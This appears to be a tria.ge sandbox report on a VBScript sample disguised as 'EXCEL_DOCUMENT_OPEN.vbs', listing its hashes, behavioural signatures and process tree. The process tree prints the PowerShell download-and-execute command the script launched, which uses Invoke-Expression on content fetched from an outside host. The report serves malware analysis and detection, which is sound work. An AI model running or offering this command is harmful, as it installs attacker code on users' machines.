Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
12/08/2024, 11:41
240812-ntgelazapr 808/05/2024, 15:00
240508-sdtr7sab2w 805/04/2024, 15:07
240405-shpdaafc3v 1004/04/2024, 20:19
240404-y3t26aaa37 10Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
04/04/2024, 20:19
Static task
static1
Behavioral task
behavioral1
Sample
EXCEL_DOCUMENT_OPEN.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
EXCEL_DOCUMENT_OPEN.vbs
Resource
win10-20240404-en
General
-
Target
EXCEL_DOCUMENT_OPEN.vbs
-
Size
23KB
-
MD5
6925ed4c3665b27592c356b0bbd4948d
-
SHA1
7429a3929f68c87af85266c5d304f3e26e11a8c0
-
SHA256
5237e653da5478c91e1de3d51a9713753b4bc1b4c9be8e9136cd9d94e216ae77
-
SHA512
333ffd943ea86e75822f6c59412fe12b77f95ddeffd1f0286606faab19b595b27b528457158cc6afe2dcb75455ce9e1fb012ddf171f895135fc90e9d249599b6
-
SSDEEP
384:J0Y5Y65Go4F0yNWe037NwNAUihUN+0X2RyiUiK3xYUif3JNB6Bcy:hYFFFNWe037NwNAUiKNIRyiUiK3xYUi2
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2840 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2840 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2224 wrote to memory of 2840 2224 WScript.exe 28 PID 2224 wrote to memory of 2840 2224 WScript.exe 28 PID 2224 wrote to memory of 2840 2224 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXCEL_DOCUMENT_OPEN.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'irreceiver.com/lcyqeksm')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-